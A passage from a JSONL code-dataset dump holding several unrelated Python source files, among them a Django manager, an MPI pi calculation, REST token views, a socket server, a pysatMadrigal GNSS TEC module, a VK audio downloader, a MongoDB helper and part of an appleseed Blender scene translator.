main()\n","sub_path":"states/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":4463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"432625339","text":"from django.db import models\nfrom django.db.models.query import QuerySet\n\n\nclass StudySpecificManager(models.Manager):\n\n def get_query_set(self):\n qs = QuerySet(self.model, using=self._db).all()\n if not qs:\n return qs\n raise ValueError('Application is accessing model StudySpecific but you have not populated it. Please do so before continuing.')\n qs = QuerySet(self.model, using=self._db).filter(pk=qs[0].pk)\n return qs\n\n def get_subject_types(self):\n if super(StudySpecificManager, self).all():\n if not super(StudySpecificManager, self).all()[0].subject_type:\n raise TypeError('Please indicate the subject types for this protocol in model StudySpecific. e.g. \\'subject\\' or \\'maternal, infant\\', etc')\n else:\n raise ValueError('Application is accessing model StudySpecific but you have not populated it. Please do so before continuing.')\n return super(StudySpecificManager, self).all()[0].subject_type.split(', ')\n","sub_path":"edc/core/bhp_variables/managers/study_specific_manager.py","file_name":"study_specific_manager.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"565072334","text":"from mpi4py import MPI\nimport numpy\n\ndef compute_pi(n, start=0, step=1):\n h = 1.0 / n\n s = 0.0\n for i in range(start, n, step):\n x = h * (i + 0.5)\n s += 4.0 / (1.0 + x**2)\n return s * h\n\ncomm = MPI.COMM_WORLD\nnprocs = comm.Get_size()\nmyrank = comm.Get_rank()\n\nif myrank == 0:\n n = 10\n n = numpy.array(n, dtype='i')\nelse:\n n = numpy.array(0, dtype='i')\ncomm.Bcast([n, MPI.INT], root=0)\n\nmypi = compute_pi(n, myrank, nprocs)\n\nmypi = numpy.array(mypi, dtype='d')\nif myrank == 0:\n pi = numpy.array(0, dtype='d')\nelse:\n pi = None\ncomm.Reduce([mypi, MPI.DOUBLE], \n [pi, MPI.DOUBLE],\n op=MPI.SUM, root=0)\n\nif myrank == 0:\n error = abs(pi - numpy.pi)\n print(\"pi is approximately %.16f, error is %.16f\" % (pi, error))\n","sub_path":"mpi_for_python/exercises/ex4.py","file_name":"ex4.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"488583150","text":"\"\"\" API endpoint views \"\"\"\n\n# Module imports\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\n\n# Application imports\nfrom engine.serializers import (\n UserLoginSerializer,\n RefreshTokenSerializer\n)\n\n\nclass GenerateTokensView(APIView):\n \"\"\" API for token generation \"\"\"\n\n # API setup\n permission_classes = ()\n authentication_classes = ()\n\n # Response variables\n response = None\n response_code = None\n\n def post(self, request):\n \"\"\" Method handling post request made to this API endpoint \"\"\"\n\n # Login serializer initialization with the incoming data\n loginSerializer = UserLoginSerializer(data=request.data)\n\n # API logic\n if loginSerializer.is_valid():\n self.response = loginSerializer.data\n self.response_code = 200\n else:\n self.response = loginSerializer.errors\n self.response_code = 400\n\n # API response using response variables\n return Response(self.response, self.response_code)\n\n\nclass RefreshTokenView(APIView):\n \"\"\" API for access token refreshing \"\"\"\n\n # API setup\n permission_classes = ()\n authentication_classes = ()\n\n # Response variables\n response = None\n response_code = None\n\n def post(self, request):\n \"\"\" Method handling post request made to this API endpoint \"\"\"\n\n # Refresh serializer initialization with the incoming data\n refreshSerializer= RefreshTokenSerializer(data=request.data)\n\n # API logic\n if refreshSerializer.is_valid():\n self.response = refreshSerializer.data\n self.response_code = 200\n else:\n self.response = refreshSerializer.errors\n self.response_code = 400\n\n # API response using response variables\n return Response(self.response, self.response_code)\n\n\n\n","sub_path":"auth_server/engine/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"365037692","text":"import matplotlib.pyplot as plt\nimport numpy as np\n# plt.xlim(0, 1000)\n# plt.ylim(0, 10000)\nx = [0.1, 23.3, 100, 1000]\ny = [10, 3524, 3524, 3524]\nplt.plot(x, y)\nplt.xlim([0, 1000])\nplt.ylim([0, 10000])\nplt.yticks(np.arange(0, 1000, 10))\nplt.xticks(np.arange(0, 10000, 10))\n\n# plt.xticks(np.arange(min(x), max(x), 10))\n# plt.yticks(np.arange(min(y), max(y), 10))\nplt.ylabel('Stimulus average')\nplt.xlabel('Time(ms)')\nplt.title('Q3: Spike triggered average over a 100ms')\nplt.show()\n","sub_path":"src_openCL/ploy.py","file_name":"ploy.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"4536121","text":"from socket import socket, AF_INET, SOCK_STREAM\r\nfrom select import select\r\nfrom time import sleep\r\n\r\nHOST=''\r\nPORT=4000\r\n\r\nclass ServerObject(object):\r\n\tdef __init__(self,host,port):\r\n\t\ttry:\r\n\t\t\tself.serversock = socket(AF_INET, SOCK_STREAM)\r\n\t\t\tself.serversock.bind((host,port))\r\n\t\t\tself.serversock.listen(10)\r\n\t\t\tself.serversock.setblocking(0)\r\n\t\texcept socket.error as msg:\r\n\t\t\tprint(f\"Server socket init failed with message: {str(msg[0])} message {str(msg[1])}\")\r\n\t\t\tinput(\"Pess enter to exit\")\r\n\t\t\texit(1)\r\n\t\tself.serverrunning = True\r\n\t\tself.port = port\r\n\t\tself.clientlist = []\r\n\r\nclass ClientObject(object):\r\n\tdef __init__(self,insock,addr):\r\n\t\tself.clientsock = insock\r\n\t\tself.host = addr[0]\r\n\t\tself.port = addr[1]\r\n\r\n#MAIN\r\nserver = ServerObject(HOST,PORT)\r\nprint(\"server online\")\r\nwhile server.serverrunning:\r\n\tsleep(0.1)\r\n\tpotentialreads = []\r\n\tif len(server.clientlist) > 0:\r\n\t\tfor potentialread in server.clientlist:\r\n\t\t\tpotentialreads.append(potentialreads.clientsock)\r\n\t\t\tprint(potentialread)\r\n\tif len(potentialreads) > 0:\r\n\t\treadsocks, writesocks, errorsocks = select(potentialreads,potentialreads,potentialreads,1)\r\n\t\tif len(readsocks) > 0:\r\n\t\t\tfor readsock in readsocks:\r\n\t\t\t\tif readsock == server.serversock:\r\n\t\t\t\t\tinsock, addr = server.serversock.accept()\r\n\t\t\t\t\tnewclient = ClientObject(insock,addr)\r\n\t\t\t\t\tserver.clientlist.append(newclient)\r\n\t\t\t\t\tprint(f\"New connection from {str(newclient.host)}:{str(newclient.port)}\")\r\n\t\t\t\telse:\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\tdata = readsock.recv(1024)\r\n\t\t\t\t\t\tif data:\r\n\t\t\t\t\t\t\tprint(f\"Recieved input: {data} from {readsock.addr}\")\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\tprint(f\"Client {readsock.addr}:{readsock.port} disconnected. Connection reset by peer\")\r\n\t\t\t\t\t\treadsock.close()\r\n\t\t\t\t\t\tif len(server.clientlist) > 0:\r\n\t\t\t\t\t\t\tfor client in server.clientlist:\r\n\t\t\t\t\t\t\t\tif client.clientsock == readsock:\r\n\t\t\t\t\t\t\t\t\tserver.clientlist.remove(client)\r\n\t\t\t\t\t\t\t\t\tbreak\r\n","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"309934905","text":"# -*- coding: utf-8 -*-.\n\"\"\"Supports the MIT Haystack GNSS TEC data products\n\nThe Global Navigation Satellite System (GNSS) is used in conjunction with a\nworld-wide receiver network to produce total electron content (TEC) data\nproducts, including vertical and line-of-sight TEC.\n\nDownloads data from the MIT Haystack Madrigal Database.\n\nProperties\n----------\nplatform\n 'gnss'\nname\n 'tec'\ntag\n 'vtec'\n\nExamples\n--------\n::\n\n import datetime as dt\n import pysat\n import pysatMadrigal as pymad\n\n vtec = pysat.Instrument(inst_module=pymad.instruments.gnss_tec, tag='vtec')\n vtec.download(dt.datetime(2017, 11, 19), dt.datetime(2017, 11, 20),\n user='Firstname+Lastname', password='email@address.com')\n vtec.load(date=dt.datetime(2017, 11, 19))\n\n\nNote\n----\nPlease provide name and email when downloading data with this routine.\n\n\"\"\"\n\nimport datetime as dt\nimport functools\nimport numpy as np\n\nfrom pysat import logger\n\nfrom pysatMadrigal.instruments.methods import general, gnss\n\n# ----------------------------------------------------------------------------\n# Instrument attributes\n\nplatform = 'gnss'\nname = 'tec'\ntags = {'vtec': 'vertical TEC'}\ninst_ids = {'': [tag for tag in tags.keys()]}\n\npandas_format = False\n\n# Local attributes\ndname = '{{year:02d}}{{month:02d}}{{day:02d}}'\nvname = '.{{version:03d}}'\nsupported_tags = {ss: {'vtec': ''.join(['gps', dname, 'g', vname,\n \".{file_type}\"])}\n for ss in inst_ids.keys()}\nremote_tags = {ss: {kk: supported_tags[ss][kk].format(file_type='hdf5')\n for kk in inst_ids[ss]} for ss in inst_ids.keys()}\n\n# Madrigal tags\nmadrigal_inst_code = 8000\nmadrigal_tag = {'': {'vtec': '3500'}} # , 'los': '3505'}} <- Issue #12\n\n# ----------------------------------------------------------------------------\n# Instrument test attributes\n\n_test_dates = {'': {'vtec': dt.datetime(2017, 11, 19)}}\n\n# ----------------------------------------------------------------------------\n# Instrument methods\n\n\ndef init(self):\n \"\"\"Initializes the Instrument object with values specific to GNSS TEC\n\n Runs once upon instantiation.\n\n \"\"\"\n\n ackn_str = '\\n'.join([gnss.acknowledgements(self.name),\n general.cedar_rules()])\n\n logger.info(ackn_str)\n self.acknowledgements = ackn_str\n self.references = gnss.references(self.name, self.tag)\n\n return\n\n\ndef clean(self):\n \"\"\"Routine to return GNSS TEC data at a specific level\n\n Note\n ----\n Supports 'clean', 'dusty', 'dirty', or 'None'.\n Routine is called by pysat, and not by the end user directly.\n\n \"\"\"\n if self.tag == \"vtec\":\n logger.info(\"\".join([\"Data provided at a clean level, further \",\n \"cleaning may be performed using the \",\n \"measurement error 'dtec'\"]))\n\n return\n\n\n# ----------------------------------------------------------------------------\n# Instrument functions\n#\n# Use the default Madrigal methods\n\n# Support listing the local files\nlist_files = functools.partial(general.list_files,\n supported_tags=supported_tags,\n two_digit_year_break=99)\n\n# Support listing files currently available on remote server (Madrigal)\nlist_remote_files = functools.partial(general.list_remote_files,\n supported_tags=remote_tags,\n inst_code=madrigal_inst_code,\n kindats=madrigal_tag)\n\n\ndef download(date_array, tag='', inst_id='', data_path=None, user=None,\n password=None, url='http://cedar.openmadrigal.org',\n file_type='netCDF4'):\n \"\"\"Downloads data from Madrigal.\n\n Parameters\n ----------\n date_array : array-like\n list of datetimes to download data for. The sequence of dates need not\n be contiguous.\n tag : str\n Tag identifier used for particular dataset. This input is provided by\n pysat. (default='')\n inst_id : str\n Instrument ID string identifier used for particular dataset. This input\n is provided by pysat. (default='')\n data_path : str\n Path to directory to download data to. (default=None)\n user : str\n User string input used for download. Provided by user and passed via\n pysat. (default=None)\n password : str\n Password for data download. (default=None)\n url : str\n URL for Madrigal site (default='http://cedar.openmadrigal.org')\n file_type : str\n File format for Madrigal data. (default='netCDF4')\n\n Note\n ----\n The user's names should be provided in field user. Anthea Coster should\n be entered as Anthea+Coster\n\n The password field should be the user's email address. These parameters\n are passed to Madrigal when downloading.\n\n The affiliation field is set to pysat to enable tracking of pysat\n downloads.\n\n \"\"\"\n general.download(date_array, inst_code=str(madrigal_inst_code),\n kindat=madrigal_tag[inst_id][tag], data_path=data_path,\n user=user, password=password, file_type=file_type, url=url)\n\n return\n\n\ndef load(fnames, tag=None, inst_id=None):\n \"\"\" Routine to load the GNSS TEC data\n\n Parameters\n ----------\n fnames : list\n List of filenames\n tag : str or NoneType\n tag name used to identify particular data set to be loaded.\n This input is nominally provided by pysat itself. (default=None)\n inst_id : str or NoneType\n Instrument ID used to identify particular data set to be loaded.\n This input is nominally provided by pysat itself. (default=None)\n\n Returns\n -------\n data : xarray.Dataset\n Object containing satellite data\n meta : pysat.Meta\n Object containing metadata such as column names and units\n\n \"\"\"\n # Define the xarray coordinate dimensions (apart from time)\n # Not needed for netCDF\n xcoords = {'vtec': {('time', 'gdlat', 'glon', 'kindat', 'kinst'):\n ['gdalt', 'tec', 'dtec'],\n ('time', ): ['year', 'month', 'day', 'hour', 'min',\n 'sec', 'ut1_unix', 'ut2_unix', 'recno']}}\n\n # Load the specified data\n data, meta = general.load(fnames, tag, inst_id, xarray_coords=xcoords[tag])\n\n # Squeeze the kindat and kinst 'coordinates', but keep them as floats\n squeeze_dims = np.array(['kindat', 'kinst'])\n squeeze_mask = [sdim in data.coords for sdim in squeeze_dims]\n if np.any(squeeze_mask):\n data = data.squeeze(dim=squeeze_dims[squeeze_mask])\n\n # Fix the units for tec and dtec\n if tag == 'vtec':\n meta['tec'] = {meta.labels.units: 'TECU'}\n meta['dtec'] = {meta.labels.units: 'TECU'}\n\n return data, meta\n","sub_path":"pysatMadrigal/instruments/gnss_tec.py","file_name":"gnss_tec.py","file_ext":"py","file_size_in_byte":6852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"498650087","text":"import urllib.request\nfrom os import mkdir, path\n\n\nclass VkResponse:\n\tdef __init__(self, token):\n\t\tself.token = token\n\n\tdef get_audio_list(self, user_id=107920434):\n\t\turl = 'https://api.vk.com/method/audio.get.xml?owner_id={uid}&access_token={token}'.format(\n\t\t\ttoken=self.token,\n\t\t\tuid=user_id\n\t\t)\n\t\tout = open('./cache/audio.xml', 'w', encoding='utf-8')\n\t\tdata = urllib.request.urlopen(url).read()\n\t\tdata_str = data.decode('utf-8', 'ignore')\n\t\tfor i in range(len(data_str)):\n\t\t\ttry:\n\t\t\t\tdata_str[i].encode('cp1251')\n\t\t\texcept:\n\t\t\t\tdata_str = data_str[:i] + data_str[i + 1:]\n\n\t\tout.write(data_str)\n\t\treturn data_str\n\n\nclass AudioFile:\n\tdef __init__(self, aid, url, title, artist):\n\t\tself.aid = aid\n\t\tself.url = url\n\t\tself.title = title.strip().replace('\\\\', '_').replace('/', '_').replace('?', '_').replace('\"', \"'\").replace(':',\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t'-')\n\t\tself.artist = artist.strip().replace('\\\\', '_').replace('/', '_').replace('?', '_').replace('\"', \"'\").replace(\n\t\t\t':', '-')\n\n\tdef download_audio(self):\n\t\ttry:\n\t\t\tprint('{artist} - {title}...'.format(artist=self.artist, title=self.title))\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tdata = urllib.request.urlopen(self.url).read()\n\t\t\t# data = ''.encode()\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tif not path.exists('./cache/' + self.artist):\n\t\t\t\tmkdir('./cache/' + self.artist)\n\t\texcept:\n\t\t\treturn False\n\n\t\ttry:\n\t\t\tout = open(\n\t\t\t\t'./cache/' + self.artist + '/{artist} - {title}.mp3'.format(artist=self.artist, title=self.title),\n\t\t\t\t'wb')\n\t\texcept:\n\t\t\treturn False\n\n\t\tout.write(data)\n\t\treturn True\n","sub_path":"vk_response.py","file_name":"vk_response.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"109340552","text":"import pymongo\nfrom datetime import datetime\nimport cv2\nfrom urllib.parse import quote_plus\nfrom bunch import Bunch\nimport Notification\n\nclass AutofacesMongoDB():\n\n def __init__(self, config):\n '''\n __init__(self, username, password, host, port, db = None, col = None)\n '''\n # MongoDB info\n dbconfig = Bunch(config.mongodb)\n\n self.host = dbconfig.host\n self.port = dbconfig.port\n self.db = dbconfig.name\n self.collection = dbconfig.collection\n\n mongodb_uri = \"mongodb://%s:%s\"%(self.host, self.port)\n \n print(\"Connecting to MongoDB...\")\n self.client = pymongo.MongoClient(mongodb_uri)\n self.notifier = Notification(Bunch(config.notification))\n\n def dbinfo(self):\n print(\"MongoDB host: %s\" % self.host)\n print(\"MongoDB port: %s\" % self.port)\n print(\"Default database: %s\" % self.db)\n print(\"Default collection: %s\" % self.collection)\n\n def save(self, data, db = None, col = None):\n '''\n method: save2db(data, db = None, col = None),\n data = {\n \"time\": datetime.now()\n \"face_class\": face_class,\n \"prob\": prob,\n },\n db: mongodb database, default value = object.db,\n col: mongodb collection, default value = object.collection.\n '''\n\n if db == None:\n db = self.db\n if col == None:\n col = self.collection\n try:\n mydb = self.client[self.db]\n mycol = mydb[col]\n mycol.insert_one(data)\n print(\"Successfully inserted \", str(data), \"to \", db + '.' + col)\n # print(mycol)\n except Exception as e:\n print(\"MongoDB exception: \" + str(e))\n\n def create_data(self, frame, pred_clsname, max_prob):\n if not os.path.exists('./datasets/new-frame'):\n os.makedirs('./datasets/new-frame')\n\n created_time = datetime.now()\n time_str = str(created_time)\n time_str = re.sub('[:-]', '', time_str.split('.')[0])\n time_str = re.sub(' ', '_', time_str)\n image_link = './datasets/new-frame/' + pred_clsname + '_' + time_str + '.jpg'\n try:\n cv2.imwrite(image_link, frame)\n except:\n print(\"Imwrite error in autoface.createData function.\")\n predict_data = {\n \"time\": created_time,\n 'face_class': pred_clsname,\n 'prob': float(max_prob),\n 'image_link': image_link\n }\n \n # wait 1 seconds to save next image\n next_time_can_save_img = datetime.now() + timedelta(seconds=1)\n return next_time_can_save_img, predict_data\n\n def save_and_noti(self, frame, pred_clsname, max_prob):\n next_time_can_save_img, predict_data = self.create_data(frame, pred_clsname, max_prob)\n self.save(predict_data)\n\n if emailNotification.isNewDay(saved_day):\n # reset dict values\n for key in checkin:\n checkin[key] = False\n # renew saved_day\n saved_day = date.today()\n \n if checkin[pred_clsname] is False:\n checkin[pred_clsname] = True\n self.notifier.send_mail(frame, pred_clsname, prob)\n","sub_path":"utils/mongodb.py","file_name":"mongodb.py","file_ext":"py","file_size_in_byte":3250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"466891781","text":"#\n# This source file is part of appleseed.\n# Visit http://appleseedhq.net/ for additional information and resources.\n#\n# This software is released under the MIT license.\n#\n# Copyright (c) 2014-2018 The appleseedhq Organization\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n\nimport math\nimport os\n\nimport bpy\n\nimport appleseed as asr\nfrom .camera import CameraTranslator, InteractiveCameraTranslator\nfrom .group import GroupTranslator\nfrom .assethandlers import AssetHandler, CopyAssetsAssetHandler\nfrom .object import ArchiveTranslator, InstanceTranslator\nfrom .translator import ObjectKey, ProjectExportMode\nfrom .world import WorldTranslator\nfrom ..logger import get_logger\nfrom ..utils.util import Timer, inscenelayer\n\nlogger = get_logger()\n\n\nclass SceneTranslator(GroupTranslator):\n \"\"\"\n Class that translates a Blender scene to an appleseed project.\n \"\"\"\n\n #\n # Constants and settings.\n #\n\n OBJECT_TYPES_TO_IGNORE = {'ARMATURE'}\n\n #\n # Constructors.\n #\n\n @classmethod\n def create_project_export_translator(cls, scene, filename):\n \"\"\"\n Create a scene translator to export the scene to an appleseed project on disk.\n \"\"\"\n\n project_dir = os.path.dirname(filename)\n\n logger.debug(\"Creating texture and geometry directories in %s\", project_dir)\n\n geometry_dir = os.path.join(project_dir, \"_geometry\")\n textures_dir = os.path.join(project_dir, \"_textures\")\n\n if not os.path.exists(geometry_dir):\n os.makedirs(geometry_dir)\n\n if not os.path.exists(textures_dir):\n os.makedirs(textures_dir)\n\n logger.debug(\"Creating project export scene translator, filename: %s\", filename)\n\n asset_handler = CopyAssetsAssetHandler(project_dir, geometry_dir, textures_dir)\n\n return cls(\n scene,\n export_mode=ProjectExportMode.PROJECT_EXPORT,\n selected_only=scene.appleseed.export_selected,\n context=None,\n asset_handler=asset_handler)\n\n @classmethod\n def create_final_render_translator(cls, scene):\n \"\"\"\n Create a scene translator to export the scene to an in memory appleseed project.\n \"\"\"\n\n logger.debug(\"Creating final render scene translator\")\n\n asset_handler = AssetHandler()\n\n return cls(\n scene,\n export_mode=ProjectExportMode.FINAL_RENDER,\n selected_only=False,\n context=None,\n asset_handler=asset_handler)\n\n @classmethod\n def create_interactive_render_translator(cls, context):\n \"\"\"\n Create a scene translator to export the scene to an in memory appleseed project\n optimized for quick interactive edits.\n \"\"\"\n\n logger.debug(\"Creating interactive render scene translator\")\n\n asset_handler = AssetHandler()\n\n return cls(\n scene=context.scene,\n export_mode=ProjectExportMode.INTERACTIVE_RENDER,\n selected_only=False,\n context=context,\n asset_handler=asset_handler)\n\n def __init__(self, scene, export_mode, selected_only, context, asset_handler):\n \"\"\"\n Constructor. Do not use it to create instances of this class.\n Use the @classmethods instead.\n \"\"\"\n\n super(SceneTranslator, self).__init__(scene, export_mode, selected_only, asset_handler)\n\n self.__selected_only = selected_only\n\n self.__context = context\n\n self.__viewport_resolution = None\n\n # Translators.\n self.__world_translator = None\n self.__camera_translator = None\n self.__group_translators = {}\n\n self.__project = None\n\n #\n # Properties.\n #\n\n @property\n def bl_scene(self):\n \"\"\"\n Return the Blender scene.\n \"\"\"\n return self._bl_obj\n\n @property\n def as_project(self):\n \"\"\"\n Return the appleseed project.\n \"\"\"\n return self.__project\n\n @property\n def as_scene(self):\n \"\"\"\n Return the appleseed scene.\n \"\"\"\n return self.__project.get_scene()\n\n @property\n def selected_only(self):\n return self.__selected_only\n\n @property\n def camera_translator(self):\n return self.__camera_translator\n\n #\n # Scene Translation.\n #\n\n def translate_scene(self):\n \"\"\"\n Translate the Blender scene to an appleseed project.\n \"\"\"\n\n logger.debug(\"Translating scene %s\", self.bl_scene.name)\n\n prof_timer = Timer()\n prof_timer.start()\n\n self.__create_project()\n\n self.__create_translators()\n\n # Create appleseed entities for world and camera\n if self.__world_translator:\n self.__world_translator.create_entities(self.bl_scene)\n self.__camera_translator.create_entities(self.bl_scene)\n\n # Create entities for all mesh objects and lights in scene\n self._do_create_entities(self.bl_scene)\n\n # Create entities for any linked groups (libraries) in the scene\n for x in self.__group_translators.values():\n x.create_entities(self.bl_scene)\n\n self.__calc_motion_subframes()\n\n # Insert appleseed entities into the project.\n if self.__world_translator:\n self.__world_translator.flush_entities(self.as_scene)\n\n self.__camera_translator.flush_entities(self.as_scene)\n\n self._do_flush_entities(self.__main_assembly)\n\n for x in self.__group_translators.values():\n x.flush_entities(self.__main_assembly)\n\n self.__translate_render_settings()\n self.__translate_frame()\n\n self.__load_searchpaths()\n\n prof_timer.stop()\n logger.debug(\"Scene translated in %f seconds.\", prof_timer.elapsed())\n\n def write_project(self, filename):\n \"\"\"\n Write the appleseed project out to disk.\n \"\"\"\n\n asr.ProjectFileWriter().write(\n self.as_project,\n filename,\n asr.ProjectFileWriterOptions.OmitWritingGeometryFiles | asr.ProjectFileWriterOptions.OmitHandlingAssetFiles)\n\n # Interactive rendering update functions\n def update_scene(self, scene, context):\n \"\"\"\n Update the scene during interactive rendering.\n Scene updates are called whenever a parameter changes.\n \"\"\"\n\n # Set internal scene reference to current state of Blender scene\n logger.debug(\"Start scene update\")\n self._bl_obj = scene\n self.__context = context\n\n # Update materials.\n for mat in self._material_translators:\n # Get Blender material\n try:\n bl_mat = bpy.data.materials[str(mat)]\n except:\n logger.debug(\"Material not found for %s\", mat)\n continue\n\n # Check if base material is updated\n if bl_mat.is_updated or bl_mat.is_updated_data:\n logger.debug(\"Updating material %s\", mat)\n self._material_translators[mat].update(bl_mat, self.__main_assembly, scene)\n\n # Check if material node tree has been updated\n if bl_mat.appleseed.osl_node_tree is not None:\n if bl_mat.appleseed.osl_node_tree.is_updated:\n logger.debug(\"Updating material tree for %s\", mat)\n self._material_translators[mat].update(bl_mat, self.__main_assembly, scene)\n\n # Update lamp materials\n for mat in self._lamp_material_translators:\n # Get Blender lamp\n try:\n bl_lamp = bpy.data.lamps[str(mat)]\n except:\n logger.debug(\"Material not found for %s\", mat)\n continue\n if bl_lamp.appleseed.osl_node_tree.is_updated or bl_lamp.is_updated:\n logger.debug(\"Updating material tree for %s\", mat)\n self._lamp_material_translators[mat].update(bl_lamp, self.__main_assembly, scene)\n\n # Update objects\n for translator in self._object_translators:\n try:\n bl_obj = bpy.data.objects[str(translator)]\n\n if bl_obj.is_updated or bl_obj.is_updated_data:\n logger.debug(\"Updating object %s\", translator)\n self._object_translators[translator].update(bl_obj)\n except:\n logger.debug(\"Object not found for %s\", translator)\n\n for translator in self._dupli_translators:\n try:\n bl_obj = bpy.data.objects[str(translator)]\n\n if bl_obj.is_updated or bl_obj.is_updated_data:\n logger.debug(\"Updating dupli object %s\", translator)\n\n self._dupli_translators[translator].update(bl_obj, self.bl_scene)\n except Exception as e:\n logger.debug(\"Dupli object not found for %s, exception: %s\", translator, e)\n\n for translator in self._lamp_translators:\n try:\n bl_lamp = bpy.data.objects[str(translator)]\n\n if bl_lamp.is_updated or bl_lamp.is_updated_data:\n logger.debug(\"Updating lamp %s\", translator)\n self._lamp_translators[translator].update(bl_lamp, self.__main_assembly, scene)\n except:\n logger.debug(\"Lamp not found for %s\", translator)\n\n if self.bl_scene.world.is_updated or self.bl_scene.world.is_updated_data:\n self.__world_translator.update(self.bl_scene, self.as_scene)\n\n if self.bl_scene.camera.is_updated or self.bl_scene.camera.is_updated_data:\n self.__camera_translator.update(self.as_scene, camera=self.bl_scene.camera, context=self.__context)\n\n self.__camera_translator.set_transform(0.0)\n\n def check_view(self, context):\n \"\"\"\n Check the viewport to see if it has changed camera position or window size.\n For whatever reason, these changes do not trigger an update request so we must check things manually.\n \"\"\"\n\n view_update = False\n self.__context = context\n\n # Check if the camera needs to be updated\n cam_param_update, cam_translate_update = self.__camera_translator.check_for_camera_update(self.bl_scene.camera, self.__context)\n\n # Check if the frame needs to be updated\n width = int(self.__context.region.width)\n height = int(self.__context.region.height)\n new_viewport_resolution = [width, height]\n if new_viewport_resolution != self.__viewport_resolution:\n view_update = True\n cam_param_update = True\n\n return view_update, cam_param_update, cam_translate_update\n\n def update_view(self, view_update, cam_param_update):\n \"\"\"\n Update the viewport window during interactive rendering. The viewport update is triggered\n automatically following a scene update, or when the check view function returns true on any of its checks.\n \"\"\"\n\n logger.debug(\"Begin view update\")\n\n if cam_param_update:\n self.__camera_translator.update(self.as_scene)\n\n if view_update:\n self.__translate_frame()\n\n self.__camera_translator.set_transform(0.0)\n\n #\n # Internal methods.\n #\n\n def __create_project(self):\n \"\"\"\n Create a default empty project.\n \"\"\"\n\n logger.debug(\"Creating appleseed project\")\n\n self.__project = asr.Project(self.bl_scene.name)\n\n # Render settings.\n self.__project.add_default_configurations()\n\n # Create the scene.\n self.__project.set_scene(asr.Scene())\n\n # Create the environment.\n self.__project.get_scene().set_environment(asr.Environment(\"environment\", {}))\n\n # Create the main assembly.\n self.__project.get_scene().assemblies().insert(asr.Assembly(\"assembly\", {}))\n self.__main_assembly = self.__project.get_scene().assemblies()[\"assembly\"]\n\n # Instance the main assembly.\n assembly_inst = asr.AssemblyInstance(\"assembly_inst\", {}, \"assembly\")\n assembly_inst.transform_sequence().set_transform(0.0, asr.Transformd(asr.Matrix4d.identity()))\n self.__project.get_scene().assembly_instances().insert(assembly_inst)\n\n # Create default materials.\n self.__create_default_material()\n self.__create_null_material()\n\n def __create_world_translator(self):\n logger.debug(\"Creating world translator\")\n\n self.__world_translator = WorldTranslator(self.bl_scene, self.asset_handler)\n\n def __create_translators(self):\n \"\"\"\n Create translators for each Blender object. These translators contain all the functions and information\n necessary to convert Blender objects, lights, cameras and materials into equivalent appleseed entities.\n \"\"\"\n\n if self.bl_scene.world.appleseed_sky.env_type != 'none':\n self.__create_world_translator()\n\n # Create translators for all objects in the scene.\n super(SceneTranslator, self)._create_translators(self.bl_scene)\n\n # Always create a translator for the active camera even if it is not visible or renderable.\n if self.bl_scene.camera:\n obj_key = ObjectKey(self.bl_scene.camera)\n logger.debug(\"Creating camera translator for active camera %s\", obj_key)\n if self.export_mode != ProjectExportMode.INTERACTIVE_RENDER:\n self.__camera_translator = CameraTranslator(self.bl_scene.camera, self.asset_handler)\n else:\n self.__camera_translator = InteractiveCameraTranslator(self.bl_scene.camera, self.__context, self.asset_handler)\n else:\n # Create dummy camera for interactive mode\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER:\n self.__camera_translator = InteractiveCameraTranslator(None, self.__context, self.asset_handler)\n\n for obj in self.bl_scene.objects:\n\n # Skip object types that are not renderable.\n if obj.type in SceneTranslator.OBJECT_TYPES_TO_IGNORE:\n logger.debug(\"Ignoring object %s of type %s\", obj.name, obj.type)\n continue\n\n if obj.hide_render:\n continue\n\n if self.export_mode == ProjectExportMode.INTERACTIVE_RENDER and obj.hide:\n continue\n\n if not inscenelayer(obj, self.bl_scene):\n logger.debug(\"skipping invisible object %s\", 